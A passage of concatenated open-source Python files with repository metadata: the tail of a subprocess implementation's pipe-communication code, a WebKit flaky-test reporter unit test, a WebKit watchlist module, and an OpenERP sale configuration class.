                # been writing to .stdin in an uncontrolled fashion.
                self.stdin.flush()
                if not input:
                    self.stdin.close()

            if _has_poll:
                stdout, stderr = self._communicate_with_poll(input, endtime,
                                                             orig_timeout)
            else:
                stdout, stderr = self._communicate_with_select(input, endtime,
                                                               orig_timeout)

            self.wait(timeout=self._remaining_time(endtime))

            # All data exchanged.  Translate lists into strings.
            if stdout is not None:
                stdout = b''.join(stdout)
            if stderr is not None:
                stderr = b''.join(stderr)

            # Translate newlines, if requested.
            # This also turns bytes into strings.
            if self.universal_newlines:
                if stdout is not None:
                    stdout = self._translate_newlines(stdout,
                                                      self.stdout.encoding)
                if stderr is not None:
                    stderr = self._translate_newlines(stderr,
                                                      self.stderr.encoding)

            return (stdout, stderr)

        def _save_input(self, input):
            # This method is called from the _communicate_with_*() methods
            # so that if we time out while communicating, we can continue
            # sending input if we retry.
            if self.stdin and self._input is None:
                self._input_offset = 0
                self._input = input
                if self.universal_newlines and input is not None:
                    self._input = self._input.encode(self.stdin.encoding)

        def _communicate_with_poll(self, input, endtime, orig_timeout):
            stdout = None # Return
            stderr = None # Return

            if not self._communication_started:
                self._fd2file = {}

            poller = select.poll()

            # Local helpers keep the fd bookkeeping in one place.
            def register_and_append(file_obj, eventmask):
                poller.register(file_obj.fileno(), eventmask)
                self._fd2file[file_obj.fileno()] = file_obj

            def close_unregister_and_remove(fd):
                poller.unregister(fd)
                self._fd2file[fd].close()
                self._fd2file.pop(fd)

            if self.stdin and input:
                register_and_append(self.stdin, select.POLLOUT)

            # Only create this mapping if we haven't already.
            if not self._communication_started:
                self._fd2output = {}
                if self.stdout:
                    self._fd2output[self.stdout.fileno()] = []
                if self.stderr:
                    self._fd2output[self.stderr.fileno()] = []

            select_POLLIN_POLLPRI = select.POLLIN | select.POLLPRI
            if self.stdout:
                register_and_append(self.stdout, select_POLLIN_POLLPRI)
                stdout = self._fd2output[self.stdout.fileno()]
            if self.stderr:
                register_and_append(self.stderr, select_POLLIN_POLLPRI)
                stderr = self._fd2output[self.stderr.fileno()]

            self._save_input(input)

            while self._fd2file:
                timeout = self._remaining_time(endtime)
                if timeout is not None and timeout < 0:
                    raise TimeoutExpired(self.args, orig_timeout)
                try:
                    ready = poller.poll(timeout)
                except select.error as e:
                    # Retry on EINTR, like _eintr_retry_call.
                    if e.args[0] == errno.EINTR:
                        continue
                    raise
                self._check_timeout(endtime, orig_timeout)

                # XXX Rewrite these to use non-blocking I/O on the
                # file objects; they are no longer using C stdio!

                for fd, mode in ready:
                    if mode & select.POLLOUT:
                        # Write at most _PIPE_BUF bytes so the write cannot
                        # block (see the _PIPE_BUF definition above).
                        chunk = self._input[self._input_offset :
                                            self._input_offset + _PIPE_BUF]
                        try:
                            self._input_offset += os.write(fd, chunk)
                        except OSError as e:
                            if e.errno == errno.EPIPE:
                                close_unregister_and_remove(fd)
                            else:
                                raise
                        else:
                            if self._input_offset >= len(self._input):
                                close_unregister_and_remove(fd)
                    elif mode & select_POLLIN_POLLPRI:
                        data = os.read(fd, 4096)
                        if not data:
                            close_unregister_and_remove(fd)
                        self._fd2output[fd].append(data)
                    else:
                        # Ignore hang up or errors.
close_unregister_and_remove(fd) return (stdout, stderr) def _communicate_with_select(self, input, endtime, orig_timeout): if not self._communication_started: self._read_set = [] self._write_set = [] if self.stdin and input: self._write_set.append(self.stdin) if self.stdout: self._read_set.append(self.stdout) if self.stderr: self._read_set.append(self.stderr) self._save_input(input) stdout = None # Return stderr = None # Return if self.stdout: if not self._communication_started: self._stdout_buff = [] stdout = self._stdout_buff if self.stderr: if not self._communication_started: self._stderr_buff = [] stderr = self._stderr_buff while self._read_set or self._write_set: timeout = self._remaining_time(endtime) if timeout is not None and timeout < 0: raise TimeoutExpired(self.args, orig_timeout) try: (rlist, wlist, xlist) = \ select.select(self._read_set, self._write_set, [], timeout) except select.error as e: if e.args[0] == errno.EINTR: continue raise # According to the docs, returning three empty lists indicates # that the timeout expired. if not (rlist or wlist or xlist): raise TimeoutExpired(self.args, orig_timeout) # We also check what time it is ourselves for good measure. self._check_timeout(endtime, orig_timeout) # XXX Rewrite these to use non-blocking I/O on the # file objects; they are no longer using C stdio! 
if self.stdin in wlist: chunk = self._input[self._input_offset : self._input_offset + _PIPE_BUF] try: bytes_written = os.write(self.stdin.fileno(), chunk) except OSError as e: if e.errno == errno.EPIPE: self.stdin.close() self._write_set.remove(self.stdin) else: raise else: self._input_offset += bytes_written if self._input_offset >= len(self._input): self.stdin.close() self._write_set.remove(self.stdin) if self.stdout in rlist: data = os.read(self.stdout.fileno(), 1024) if not data: self.stdout.close() self._read_set.remove(self.stdout) stdout.append(data) if self.stderr in rlist: data = os.read(self.stderr.fileno(), 1024) if not data: self.stderr.close() self._read_set.remove(self.stderr) stderr.append(data) return (stdout, stderr) def send_signal(self, sig): """Send a signal to the process """ os.kill(self.pid, sig) def terminate(self): """Terminate the process with SIGTERM """ self.send_signal(signal.SIGTERM) def kill(self): """Kill the process with SIGKILL """ self.send_signal(signal.SIGKILL)
gpl-3.0
rishilification/phantomjs
src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/bot/flakytestreporter_unittest.py
121
7698
# Copyright (c) 2010 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import unittest2 as unittest from webkitpy.common.config.committers import Committer from webkitpy.common.system.filesystem_mock import MockFileSystem from webkitpy.common.system.outputcapture import OutputCapture from webkitpy.layout_tests.models import test_results from webkitpy.layout_tests.models import test_failures from webkitpy.thirdparty.mock import Mock from webkitpy.tool.bot.flakytestreporter import FlakyTestReporter from webkitpy.tool.mocktool import MockTool from webkitpy.common.net.statusserver_mock import MockStatusServer # Creating fake CommitInfos is a pain, so we use a mock one here. class MockCommitInfo(object): def __init__(self, author_email): self._author_email = author_email def author(self): # It's definitely possible to have commits with authors who # are not in our contributors.json list. if not self._author_email: return None return Committer("Mock Committer", self._author_email) class FlakyTestReporterTest(unittest.TestCase): def _mock_test_result(self, testname): return test_results.TestResult(testname, [test_failures.FailureTextMismatch()]) def _assert_emails_for_test(self, emails): tool = MockTool() reporter = FlakyTestReporter(tool, 'dummy-queue') commit_infos = [MockCommitInfo(email) for email in emails] tool.checkout().recent_commit_infos_for_files = lambda paths: set(commit_infos) self.assertEqual(reporter._author_emails_for_test([]), set(emails)) def test_author_emails_for_test(self): self._assert_emails_for_test([]) self._assert_emails_for_test(["test1@test.com", "test1@test.com"]) self._assert_emails_for_test(["test1@test.com", "test2@test.com"]) def test_create_bug_for_flaky_test(self): reporter = FlakyTestReporter(MockTool(), 'dummy-queue') expected_logs = """MOCK create_bug bug_title: Flaky Test: foo/bar.html bug_description: This is an automatically generated bug from the dummy-queue. foo/bar.html has been flaky on the dummy-queue. foo/bar.html was authored by test@test.com. 
http://trac.webkit.org/browser/trunk/LayoutTests/foo/bar.html FLAKE_MESSAGE The bots will update this with information from each new failure. If you believe this bug to be fixed or invalid, feel free to close. The bots will re-open if the flake re-occurs. If you would like to track this test fix with another bug, please close this bug as a duplicate. The bots will follow the duplicate chain when making future comments. component: Tools / Tests cc: test@test.com blocked: 50856 """ OutputCapture().assert_outputs(self, reporter._create_bug_for_flaky_test, ['foo/bar.html', ['test@test.com'], 'FLAKE_MESSAGE'], expected_logs=expected_logs) def test_follow_duplicate_chain(self): tool = MockTool() reporter = FlakyTestReporter(tool, 'dummy-queue') bug = tool.bugs.fetch_bug(50004) self.assertEqual(reporter._follow_duplicate_chain(bug).id(), 50002) def test_report_flaky_tests_creating_bug(self): tool = MockTool() tool.filesystem = MockFileSystem({"/mock-results/foo/bar-diffs.txt": "mock"}) tool.status_server = MockStatusServer(bot_id="mock-bot-id") reporter = FlakyTestReporter(tool, 'dummy-queue') reporter._lookup_bug_for_flaky_test = lambda bug_id: None patch = tool.bugs.fetch_attachment(10000) expected_logs = """Bug does not already exist for foo/bar.html, creating. MOCK create_bug bug_title: Flaky Test: foo/bar.html bug_description: This is an automatically generated bug from the dummy-queue. foo/bar.html has been flaky on the dummy-queue. foo/bar.html was authored by abarth@webkit.org. http://trac.webkit.org/browser/trunk/LayoutTests/foo/bar.html The dummy-queue just saw foo/bar.html flake (text diff) while processing attachment 10000 on bug 50000. Bot: mock-bot-id Port: MockPort Platform: MockPlatform 1.0 The bots will update this with information from each new failure. If you believe this bug to be fixed or invalid, feel free to close. The bots will re-open if the flake re-occurs. 
If you would like to track this test fix with another bug, please close this bug as a duplicate. The bots will follow the duplicate chain when making future comments. component: Tools / Tests cc: abarth@webkit.org blocked: 50856 MOCK add_attachment_to_bug: bug_id=60001, description=Failure diff from mock-bot-id filename=failure.diff mimetype=None MOCK bug comment: bug_id=50000, cc=None --- Begin comment --- The dummy-queue encountered the following flaky tests while processing attachment 10000: foo/bar.html bug 60001 (author: abarth@webkit.org) The dummy-queue is continuing to process your patch. --- End comment --- """ test_results = [self._mock_test_result('foo/bar.html')] class MockZipFile(object): def read(self, path): return "" def namelist(self): return ['foo/bar-diffs.txt'] OutputCapture().assert_outputs(self, reporter.report_flaky_tests, [patch, test_results, MockZipFile()], expected_logs=expected_logs) def test_optional_author_string(self): reporter = FlakyTestReporter(MockTool(), 'dummy-queue') self.assertEqual(reporter._optional_author_string([]), "") self.assertEqual(reporter._optional_author_string(["foo@bar.com"]), " (author: foo@bar.com)") self.assertEqual(reporter._optional_author_string(["a@b.com", "b@b.com"]), " (authors: a@b.com and b@b.com)") def test_results_diff_path_for_test(self): reporter = FlakyTestReporter(MockTool(), 'dummy-queue') self.assertEqual(reporter._results_diff_path_for_test("test.html"), "test-diffs.txt") def test_find_in_archive(self): reporter = FlakyTestReporter(MockTool(), 'dummy-queue') class MockZipFile(object): def namelist(self): return ["tmp/layout-test-results/foo/bar-diffs.txt"] reporter._find_in_archive("foo/bar-diffs.txt", MockZipFile()) # This is not ideal, but its reporter._find_in_archive("txt", MockZipFile())
bsd-3-clause
rishilification/phantomjs
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/watchlist/watchlist.py
132
3393
# Copyright (C) 2011 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from webkitpy.common.checkout.diff_parser import DiffParser class WatchList(object): def __init__(self): self.definitions = {} self.cc_rules = set() self.message_rules = set() def find_matching_definitions(self, diff): matching_definitions = set() patch_files = DiffParser(diff.splitlines()).files for path, diff_file in patch_files.iteritems(): for definition in self.definitions: # If a definition has already matched, there is no need to process it. 
if definition in matching_definitions: continue # See if the definition matches within one file. for pattern in self.definitions[definition]: if not pattern.match(path, diff_file.lines): break else: matching_definitions.add(definition) return matching_definitions def _determine_instructions(self, matching_definitions, rules): instructions = set() for rule in rules: if rule.match(matching_definitions): instructions.update(rule.instructions()) # Sort the results to make the order deterministic (for consistency and easier testing). return sorted(instructions) def determine_cc_list(self, matching_definitions): return self._determine_instructions(matching_definitions, self.cc_rules) def determine_messages(self, matching_definitions): return self._determine_instructions(matching_definitions, self.message_rules) def determine_cc_and_messages(self, diff): definitions = self.find_matching_definitions(diff) return { 'cc_list': self.determine_cc_list(definitions), 'messages': self.determine_messages(definitions), }
bsd-3-clause
arthru/OpenUpgrade
addons/account_analytic_analysis/res_config.py
426
1408
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Business Applications # Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import fields, osv class sale_configuration(osv.osv_memory): _inherit = 'sale.config.settings' _columns = { 'group_template_required': fields.boolean("Mandatory use of templates.", implied_group='account_analytic_analysis.group_template_required', help="Allows you to set the template field as required when creating an analytic account or a contract."), }
agpl-3.0